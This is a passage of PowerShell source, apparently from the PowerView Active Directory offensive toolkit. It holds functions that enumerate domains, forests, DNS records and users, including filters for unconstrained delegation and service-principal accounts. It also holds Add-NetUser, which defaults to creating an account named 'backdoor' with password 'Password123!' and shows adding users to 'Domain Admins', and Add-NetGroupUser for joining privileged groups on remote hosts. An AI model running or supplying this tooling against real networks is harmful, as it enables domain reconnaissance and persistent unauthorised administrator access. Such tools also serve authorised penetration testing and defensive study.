process { try { $ACL = Get-Acl -Path $Path $ACL.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object { $Names = @() if ($_.IdentityReference -match '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+') { $Object = Get-ADObject -SID $_.IdentityReference $Names = @() $SIDs = @($Object.objectsid) if ($Recurse -and (@('268435456','268435457','536870912','536870913') -contains $Object.samAccountType)) { $SIDs += Get-NetGroupMember -SID $Object.objectsid | Select-Object -ExpandProperty MemberSid } $SIDs | ForEach-Object { $Names += ,@($_, (Convert-SidToName $_)) } } else { $Names += ,@($_.IdentityReference.Value, (Convert-SidToName $_.IdentityReference.Value)) } ForEach($Name in $Names) { $Out = New-Object PSObject $Out | Add-Member Noteproperty 'Path' $Path $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__) $Out | Add-Member Noteproperty 'IdentityReference' $Name[1] $Out | Add-Member Noteproperty 'IdentitySID' $Name[0] $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType $Out } } } catch { Write-Warning $_ } } } filter Get-NameField { <# .SYNOPSIS Helper that attempts to extract appropriate field names from passed computer objects. .PARAMETER Object The passed object to extract name fields from. .PARAMETER DnsHostName A DnsHostName to extract through ValueFromPipelineByPropertyName. .PARAMETER Name A Name to extract through ValueFromPipelineByPropertyName. .EXAMPLE PS C:\> Get-NetComputer -FullData | Get-NameField #> [CmdletBinding()] param( [Parameter(ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] [Object] $Object, [Parameter(ValueFromPipelineByPropertyName = $True)] [String] $DnsHostName, [Parameter(ValueFromPipelineByPropertyName = $True)] [String] $Name ) if($PSBoundParameters['DnsHostName']) { $DnsHostName } elseif($PSBoundParameters['Name']) { $Name } elseif($Object) { if ( [bool]($Object.PSobject.Properties.name -match "dnshostname") ) { # objects from Get-NetComputer $Object.dnshostname } elseif ( [bool]($Object.PSobject.Properties.name -match "name") ) { # objects from Get-NetDomainController $Object.name } else { # strings and catch alls $Object } } else { return $Null } } function Convert-LDAPProperty { <# .SYNOPSIS Helper that converts specific LDAP property result fields. Used by several of the Get-Net* function. .PARAMETER Properties Properties object to extract out LDAP fields for display. #> param( [Parameter(Mandatory=$True, ValueFromPipeline=$True)] [ValidateNotNullOrEmpty()] $Properties ) $ObjectProperties = @{} $Properties.PropertyNames | ForEach-Object { if (($_ -eq "objectsid") -or ($_ -eq "sidhistory")) { # convert the SID to a string $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0],0)).Value } elseif($_ -eq "objectguid") { # convert the GUID to a string $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid } elseif( ($_ -eq "lastlogon") -or ($_ -eq "lastlogontimestamp") -or ($_ -eq "pwdlastset") -or ($_ -eq "lastlogoff") -or ($_ -eq "badPasswordTime") ) { # convert timestamps if ($Properties[$_][0] -is [System.MarshalByRefObject]) { # if we have a System.__ComObject $Temp = $Properties[$_][0] [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) [Int32]$Low = $Temp.GetType().InvokeMember("LowPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low))) } else { $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0]))) } } elseif($Properties[$_][0] -is [System.MarshalByRefObject]) { # try to convert misc com objects $Prop = $Properties[$_] try { $Temp = $Prop[$_][0] Write-Verbose $_ [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) [Int32]$Low = $Temp.GetType().InvokeMember("LowPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null) $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low) } catch { $ObjectProperties[$_] = $Prop[$_] } } elseif($Properties[$_].count -eq 1) { $ObjectProperties[$_] = $Properties[$_][0] } else { $ObjectProperties[$_] = $Properties[$_] } } New-Object -TypeName PSObject -Property $ObjectProperties } ######################################################## # # Domain info functions below. # ######################################################## filter Get-DomainSearcher { <# .SYNOPSIS Helper used by various functions that takes an ADSpath and domain specifier and builds the correct ADSI searcher object. .PARAMETER Domain The domain to use for the query, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER ADSprefix Prefix to set for the searcher (like "CN=Sites,CN=Configuration") .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-DomainSearcher -Domain testlab.local .EXAMPLE PS C:\> Get-DomainSearcher -Domain testlab.local -DomainController SECONDARY.dev.testlab.local #> param( [Parameter(ValueFromPipeline=$True)] [String] $Domain, [String] $DomainController, [String] $ADSpath, [String] $ADSprefix, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) if(-not $Credential) { if(-not $Domain) { $Domain = (Get-NetDomain).name } elseif(-not $DomainController) { try { # if there's no -DomainController specified, try to pull the primary DC to reflect queries through $DomainController = ((Get-NetDomain).PdcRoleOwner).Name } catch { throw "Get-DomainSearcher: Error in retrieving PDC for current domain" } } } elseif (-not $DomainController) { # if a DC isn't specified try { $DomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name } catch { throw "Get-DomainSearcher: Error in retrieving PDC for current domain" } if(!$DomainController) { throw "Get-DomainSearcher: Error in retrieving PDC for current domain" } } $SearchString = "LDAP://" if($DomainController) { $SearchString += $DomainController if($Domain){ $SearchString += '/' } } if($ADSprefix) { $SearchString += $ADSprefix + ',' } if($ADSpath) { if($ADSpath -Match '^GC://') { # if we're searching the global catalog $DN = $AdsPath.ToUpper().Trim('/') $SearchString = '' } else { if($ADSpath -match '^LDAP://') { if($ADSpath -match "LDAP://.+/.+") { $SearchString = '' } else { $ADSpath = $ADSpath.Substring(7) } } $DN = $ADSpath } } else { if($Domain -and ($Domain.Trim() -ne "")) { $DN = "DC=$($Domain.Replace('.', ',DC='))" } } $SearchString += $DN Write-Verbose "Get-DomainSearcher search string: $SearchString" if($Credential) { Write-Verbose "Using alternate credentials for LDAP connection" $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password) $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject) } else { $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString) } $Searcher.PageSize = $PageSize $Searcher.CacheResults = $False $Searcher } filter Convert-DNSRecord { <# .SYNOPSIS Decodes a binary DNS record. Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 .PARAMETER DNSRecord The domain to query for zones, defaults to the current domain. .LINK https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 #> param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)] [Byte[]] $DNSRecord ) function Get-Name { # modified decodeName from https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1 [CmdletBinding()] param( [Byte[]] $Raw ) [Int]$Length = $Raw[0] [Int]$Segments = $Raw[1] [Int]$Index = 2 [String]$Name = "" while ($Segments-- -gt 0) { [Int]$SegmentLength = $Raw[$Index++] while ($SegmentLength-- -gt 0) { $Name += [Char]$Raw[$Index++] } $Name += "." } $Name } $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0) $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2) $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8) $TTLRaw = $DNSRecord[12..15] # reverse for big endian $Null = [array]::Reverse($TTLRaw) $TTL = [BitConverter]::ToUInt32($TTLRaw, 0) $Age = [BitConverter]::ToUInt32($DNSRecord, 20) if($Age -ne 0) { $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString() } else { $TimeStamp = "[static]" } $DNSRecordObject = New-Object PSObject if($RDataType -eq 1) { $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27] $Data = $IP $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A' } elseif($RDataType -eq 2) { $NSName = Get-Name $DNSRecord[24..$DNSRecord.length] $Data = $NSName $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS' } elseif($RDataType -eq 5) { $Alias = Get-Name $DNSRecord[24..$DNSRecord.length] $Data = $Alias $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME' } elseif($RDataType -eq 6) { # TODO: how to implement properly? nested object? $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA' } elseif($RDataType -eq 12) { $Ptr = Get-Name $DNSRecord[24..$DNSRecord.length] $Data = $Ptr $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'PTR' } elseif($RDataType -eq 13) { # TODO: how to implement properly? nested object? $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'HINFO' } elseif($RDataType -eq 15) { # TODO: how to implement properly? nested object? $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'MX' } elseif($RDataType -eq 16) { [string]$TXT = "" [int]$SegmentLength = $DNSRecord[24] $Index = 25 while ($SegmentLength-- -gt 0) { $TXT += [char]$DNSRecord[$index++] } $Data = $TXT $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'TXT' } elseif($RDataType -eq 28) { # TODO: how to implement properly? nested object? $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'AAAA' } elseif($RDataType -eq 33) { # TODO: how to implement properly? nested object? $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SRV' } else { $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length])) $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'UNKNOWN' } $DNSRecordObject | Add-Member Noteproperty 'UpdatedAtSerial' $UpdatedAtSerial $DNSRecordObject | Add-Member Noteproperty 'TTL' $TTL $DNSRecordObject | Add-Member Noteproperty 'Age' $Age $DNSRecordObject | Add-Member Noteproperty 'TimeStamp' $TimeStamp $DNSRecordObject | Add-Member Noteproperty 'Data' $Data $DNSRecordObject } filter Get-DNSZone { <# .SYNOPSIS Enumerates the Active Directory DNS zones for a given domain. .PARAMETER Domain The domain to query for zones, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .PARAMETER FullData Switch. Return full computer objects instead of just system names (the default). .EXAMPLE PS C:\> Get-DNSZone Retrieves the DNS zones for the current domain. .EXAMPLE PS C:\> Get-DNSZone -Domain dev.testlab.local -DomainController primary.testlab.local Retrieves the DNS zones for the dev.testlab.local domain, reflecting the LDAP queries through the primary.testlab.local domain controller. #> param( [Parameter(Position=0, ValueFromPipeline=$True)] [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential, [Switch] $FullData ) $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential $DNSSearcher.filter="(objectClass=dnsZone)" if($DNSSearcher) { $Results = $DNSSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # convert/process the LDAP fields for each result $Properties = Convert-LDAPProperty -Properties $_.Properties $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name if ($FullData) { $Properties } else { $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged } } $Results.dispose() $DNSSearcher.dispose() } $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "CN=MicrosoftDNS,DC=DomainDnsZones" $DNSSearcher.filter="(objectClass=dnsZone)" if($DNSSearcher) { $Results = $DNSSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # convert/process the LDAP fields for each result $Properties = Convert-LDAPProperty -Properties $_.Properties $Properties | Add-Member NoteProperty 'ZoneName' $Properties.name if ($FullData) { $Properties } else { $Properties | Select-Object ZoneName,distinguishedname,whencreated,whenchanged } } $Results.dispose() $DNSSearcher.dispose() } } filter Get-DNSRecord { <# .SYNOPSIS Enumerates the Active Directory DNS records for a given zone. .PARAMETER ZoneName The zone to query for records (which can be enumearted with Get-DNSZone). Required. .PARAMETER Domain The domain to query for zones, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-DNSRecord -ZoneName testlab.local Retrieve all records for the testlab.local zone. .EXAMPLE PS C:\> Get-DNSZone | Get-DNSRecord Retrieve all records for all zones in the current domain. .EXAMPLE PS C:\> Get-DNSZone -Domain dev.testlab.local | Get-DNSRecord -Domain dev.testlab.local Retrieve all records for all zones in the dev.testlab.local domain. #> param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)] [String] $ZoneName, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) $DNSSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -PageSize $PageSize -Credential $Credential -ADSprefix "DC=$($ZoneName),CN=MicrosoftDNS,DC=DomainDnsZones" $DNSSearcher.filter="(objectClass=dnsNode)" if($DNSSearcher) { $Results = $DNSSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { try { # convert/process the LDAP fields for each result $Properties = Convert-LDAPProperty -Properties $_.Properties | Select-Object name,distinguishedname,dnsrecord,whencreated,whenchanged $Properties | Add-Member NoteProperty 'ZoneName' $ZoneName # convert the record and extract the properties if ($Properties.dnsrecord -is [System.DirectoryServices.ResultPropertyValueCollection]) { # TODO: handle multiple nested records properly? $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord[0] } else { $Record = Convert-DNSRecord -DNSRecord $Properties.dnsrecord } if($Record) { $Record.psobject.properties | ForEach-Object { $Properties | Add-Member NoteProperty $_.Name $_.Value } } $Properties } catch { Write-Warning "ERROR: $_" $Properties } } $Results.dispose() $DNSSearcher.dispose() } } filter Get-NetDomain { <# .SYNOPSIS Returns a given domain object. .PARAMETER Domain The domain name to query for, defaults to the current domain. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetDomain -Domain testlab.local .EXAMPLE PS C:\> "testlab.local" | Get-NetDomain .LINK http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG #> param( [Parameter(ValueFromPipeline=$True)] [String] $Domain, [Management.Automation.PSCredential] $Credential ) if($Credential) { Write-Verbose "Using alternate credentials for Get-NetDomain" if(!$Domain) { # if no domain is supplied, extract the logon domain from the PSCredential passed $Domain = $Credential.GetNetworkCredential().Domain Write-Verbose "Extracted domain '$Domain' from -Credential" } $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain, $Credential.UserName, $Credential.GetNetworkCredential().Password) try { [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { Write-Verbose "The specified domain does '$Domain' not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid." $Null } } elseif($Domain) { $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) try { [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } catch { Write-Verbose "The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust." $Null } } else { [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() } } filter Get-NetForest { <# .SYNOPSIS Returns a given forest object. .PARAMETER Forest The forest name to query for, defaults to the current domain. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetForest -Forest external.domain .EXAMPLE PS C:\> "external.domain" | Get-NetForest #> param( [Parameter(ValueFromPipeline=$True)] [String] $Forest, [Management.Automation.PSCredential] $Credential ) if($Credential) { Write-Verbose "Using alternate credentials for Get-NetForest" if(!$Forest) { # if no domain is supplied, extract the logon domain from the PSCredential passed $Forest = $Credential.GetNetworkCredential().Domain Write-Verbose "Extracted domain '$Forest' from -Credential" } $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest, $Credential.UserName, $Credential.GetNetworkCredential().Password) try { $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) } catch { Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid." $Null } } elseif($Forest) { $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest) try { $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) } catch { Write-Verbose "The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust." return $Null } } else { # otherwise use the current forest $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() } if($ForestObject) { # get the SID of the forest root $ForestSid = (New-Object System.Security.Principal.NTAccount($ForestObject.RootDomain,"krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value $Parts = $ForestSid -Split "-" $ForestSid = $Parts[0..$($Parts.length-2)] -join "-" $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid $ForestObject } } filter Get-NetForestDomain { <# .SYNOPSIS Return all domains for a given forest. .PARAMETER Forest The forest name to query domain for. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetForestDomain .EXAMPLE PS C:\> Get-NetForestDomain -Forest external.local #> param( [Parameter(ValueFromPipeline=$True)] [String] $Forest, [Management.Automation.PSCredential] $Credential ) $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential if($ForestObject) { $ForestObject.Domains } } filter Get-NetForestCatalog { <# .SYNOPSIS Return all global catalogs for a given forest. .PARAMETER Forest The forest name to query domain for. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetForestCatalog #> param( [Parameter(ValueFromPipeline=$True)] [String] $Forest, [Management.Automation.PSCredential] $Credential ) $ForestObject = Get-NetForest -Forest $Forest -Credential $Credential if($ForestObject) { $ForestObject.FindAllGlobalCatalogs() } } filter Get-NetDomainController { <# .SYNOPSIS Return the current domain controllers for the active domain. .PARAMETER Domain The domain to query for domain controllers, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER LDAP Switch. Use LDAP queries to determine the domain controllers. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetDomainController -Domain 'test.local' Determine the domain controllers for 'test.local'. .EXAMPLE PS C:\> Get-NetDomainController -Domain 'test.local' -LDAP Determine the domain controllers for 'test.local' using LDAP queries. .EXAMPLE PS C:\> 'test.local' | Get-NetDomainController Determine the domain controllers for 'test.local'. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [String] $Domain, [String] $DomainController, [Switch] $LDAP, [Management.Automation.PSCredential] $Credential ) if($LDAP -or $DomainController) { # filter string to return all domain controllers Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter '(userAccountControl:1.2.840.113556.1.4.803:=8192)' } else { $FoundDomain = Get-NetDomain -Domain $Domain -Credential $Credential if($FoundDomain) { $Founddomain.DomainControllers } } } ######################################################## # # "net *" replacements and other fun start below # ######################################################## function Get-NetUser { <# .SYNOPSIS Query information for a given user or users in the domain using ADSI and LDAP. Another -Domain can be specified to query for users across a trust. Replacement for "net users /domain" .PARAMETER UserName Username filter string, wildcards accepted. .PARAMETER Domain The domain to query for users, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ADSpath The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Filter A customized ldap filter string to use, e.g. "(description=*admin*)" .PARAMETER AdminCount Switch. Return users with adminCount=1. .PARAMETER SPN Switch. Only return user objects with non-null service principal names. .PARAMETER Unconstrained Switch. Return users that have unconstrained delegation. .PARAMETER AllowDelegation Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-NetUser -Domain testing .EXAMPLE PS C:\> Get-NetUser -ADSpath "LDAP://OU=secret,DC=testlab,DC=local" #> param( [Parameter(Position=0, ValueFromPipeline=$True)] [String] $UserName, [String] $Domain, [String] $DomainController, [String] $ADSpath, [String] $Filter, [Switch] $SPN, [Switch] $AdminCount, [Switch] $Unconstrained, [Switch] $AllowDelegation, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) begin { # so this isn't repeated if users are passed on the pipeline $UserSearcher = Get-DomainSearcher -Domain $Domain -ADSpath $ADSpath -DomainController $DomainController -PageSize $PageSize -Credential $Credential } process { if($UserSearcher) { # if we're checking for unconstrained delegation if($Unconstrained) { Write-Verbose "Checking for unconstrained delegation" $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=524288)" } if($AllowDelegation) { Write-Verbose "Checking for users who can be delegated" # negation of "Accounts that are sensitive and not trusted for delegation" $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=1048574))" } if($AdminCount) { Write-Verbose "Checking for adminCount=1" $Filter += "(admincount=1)" } # check if we're using a username filter or not if($UserName) { # samAccountType=805306368 indicates user objects $UserSearcher.filter="(&(samAccountType=805306368)(samAccountName=$UserName)$Filter)" } elseif($SPN) { $UserSearcher.filter="(&(samAccountType=805306368)(servicePrincipalName=*)$Filter)" } else { # filter is something like "(samAccountName=*blah*)" if specified $UserSearcher.filter="(&(samAccountType=805306368)$Filter)" } $Results = $UserSearcher.FindAll() $Results | Where-Object {$_} | ForEach-Object { # convert/process the LDAP fields for each result $User = Convert-LDAPProperty -Properties $_.Properties $User.PSObject.TypeNames.Add('PowerView.User') $User } $Results.dispose() $UserSearcher.dispose() } } } function Add-NetUser { <# .SYNOPSIS Adds a domain user or a local user to the current (or remote) machine, if permissions allow, utilizing the WinNT service provider and DirectoryServices.AccountManagement, respectively. The default behavior is to add a user to the local machine. An optional group name to add the user to can be specified. .PARAMETER UserName The username to add. If not given, it defaults to 'backdoor' .PARAMETER Password The password to set for the added user. If not given, it defaults to 'Password123!' .PARAMETER GroupName Group to optionally add the user to. .PARAMETER ComputerName Hostname to add the local user to, defaults to 'localhost' .PARAMETER Domain Specified domain to add the user to. .EXAMPLE PS C:\> Add-NetUser -UserName john -Password 'Password123!' Adds a localuser 'john' to the local machine with password of 'Password123!' .EXAMPLE PS C:\> Add-NetUser -UserName john -Password 'Password123!' -ComputerName server.testlab.local Adds a localuser 'john' with password of 'Password123!' to server.testlab.local's local Administrators group. .EXAMPLE PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain '' Adds the user "john" with password "password" to the current domain and adds the user to the domain group "Domain Admins" .EXAMPLE PS C:\> Add-NetUser -UserName john -Password password -GroupName "Domain Admins" -Domain 'testing' Adds the user "john" with password "password" to the 'testing' domain and adds the user to the domain group "Domain Admins" .Link http://blogs.technet.com/b/heyscriptingguy/archive/2010/11/23/use-powershell-to-create-local-user-accounts.aspx #> [CmdletBinding()] Param ( [ValidateNotNullOrEmpty()] [String] $UserName = 'backdoor', [ValidateNotNullOrEmpty()] [String] $Password = 'Password123!', [ValidateNotNullOrEmpty()] [String] $GroupName, [ValidateNotNullOrEmpty()] [Alias('HostName')] [String] $ComputerName = 'localhost', [ValidateNotNullOrEmpty()] [String] $Domain ) if ($Domain) { $DomainObject = Get-NetDomain -Domain $Domain if(-not $DomainObject) { Write-Warning "Error in grabbing $Domain object" return $Null } # add the assembly we need Add-Type -AssemblyName System.DirectoryServices.AccountManagement # http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ # get the domain context $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList ([System.DirectoryServices.AccountManagement.ContextType]::Domain), $DomainObject # create the user object $User = New-Object -TypeName System.DirectoryServices.AccountManagement.UserPrincipal -ArgumentList $Context # set user properties $User.Name = $UserName $User.SamAccountName = $UserName $User.PasswordNotRequired = $False $User.SetPassword($Password) $User.Enabled = $True Write-Verbose "Creating user $UserName to with password '$Password' in domain $Domain" try { # commit the user $User.Save() "[*] User $UserName successfully created in domain $Domain" } catch { Write-Warning '[!] User already exists!' return } } else { Write-Verbose "Creating user $UserName to with password '$Password' on $ComputerName" # if it's not a domain add, it's a local machine add $ObjOu = [ADSI]"WinNT://$ComputerName" $ObjUser = $ObjOu.Create('User', $UserName) $ObjUser.SetPassword($Password) # commit the changes to the local machine try { $Null = $ObjUser.SetInfo() "[*] User $UserName successfully created on host $ComputerName" } catch { Write-Warning '[!] Account already exists!' return } } # if a group is specified, invoke Add-NetGroupUser and return its value if ($GroupName) { # if we're adding the user to a domain if ($Domain) { Add-NetGroupUser -UserName $UserName -GroupName $GroupName -Domain $Domain "[*] User $UserName successfully added to group $GroupName in domain $Domain" } # otherwise, we're adding to a local group else { Add-NetGroupUser -UserName $UserName -GroupName $GroupName -ComputerName $ComputerName "[*] User $UserName successfully added to group $GroupName on host $ComputerName" } } } function Add-NetGroupUser { <# .SYNOPSIS Adds a user to a domain group or a local group on the current (or remote) machine, if permissions allow, utilizing the WinNT service provider and DirectoryServices.AccountManagement, respectively. .PARAMETER UserName The domain username to query for. .PARAMETER GroupName Group to add the user to. .PARAMETER ComputerName Hostname to add the user to, defaults to localhost. .PARAMETER Domain Domain to add the user to. .EXAMPLE PS C:\> Add-NetGroupUser -UserName john -GroupName Administrators Adds a localuser "john" to the local group "Administrators" .EXAMPLE PS C:\> Add-NetGroupUser -UserName john -GroupName "Domain Admins" -Domain dev.local Adds the existing user "john" to the domain group "Domain Admins" in "dev.local" #> [CmdletBinding()] param( [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $UserName, [Parameter(Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $GroupName, [ValidateNotNullOrEmpty()] [Alias('HostName')] [String] $ComputerName, [String] $Domain ) # add the assembly if we need it Add-Type -AssemblyName System.DirectoryServices.AccountManagement # if we're adding to a remote host's local group, use the WinNT provider if($ComputerName -and ($ComputerName -ne "localhost")) { try { Write-Verbose "Adding user $UserName to $GroupName on host $ComputerName" ([ADSI]"WinNT://$ComputerName/$GroupName,group").add("WinNT://$ComputerName/$UserName,user") "[*] User $UserName successfully added to group $GroupName on $ComputerName" } catch { Write-Warning "[!] Error adding user $UserName to group $GroupName on $ComputerName" return } } # otherwise it's a local machine or domain add else { try { if ($Domain) { Write-Verbose "Adding user $UserName to $GroupName on domain $Domain" $CT = [System.DirectoryServices.AccountManagement.ContextType]::Domain $DomainObject = Get-NetDomain -Domain $Domain if(-not $DomainObject) { return $Null } # get the full principal context $Context = New-Object -TypeName System.DirectoryServices.AccountManagement.PrincipalContext -ArgumentList $CT, $DomainObject } else { # otherwise, get the local machine context Write-Verbose "Adding user $UserName to $GroupName on localhost" $Context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine, $Env:ComputerName) } # find the particular group $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($Context,$GroupName) # add the particular user to the group $Group.Members.add($Context, [System.DirectoryServices.AccountManagement.IdentityType]::SamAccountName, $UserName) # commit the changes $Group.Save() } catch { Write-Warning "Error adding $UserName to $GroupName : $_" } } } function Get-UserProperty { <# .SYNOPSIS Returns a list of all user object properties. If a property name is specified, it returns all [user:property] values. Taken directly from @obscuresec's post: http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html .PARAMETER Properties Property names to extract for users. .PARAMETER Domain The domain to query for user properties, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER PageSize The PageSize to set for the LDAP searcher object. .PARAMETER Credential A [Management.Automation.PSCredential] object of alternate credentials for connection to the target domain. .EXAMPLE PS C:\> Get-UserProperty -Domain testing Returns all user properties for users in the 'testing' domain. .EXAMPLE PS C:\> Get-UserProperty -Properties ssn,lastlogon,location Returns all an array of user/ssn/lastlogin/location combinations for users in the current domain. .LINK http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html #> [CmdletBinding()] param( [String[]] $Properties, [String] $Domain, [String] $DomainController, [ValidateRange(1,10000)] [Int] $PageSize = 200, [Management.Automation.PSCredential] $Credential ) if($Properties) { # extract out the set of all properties for each object $Properties = ,"name" + $Properties 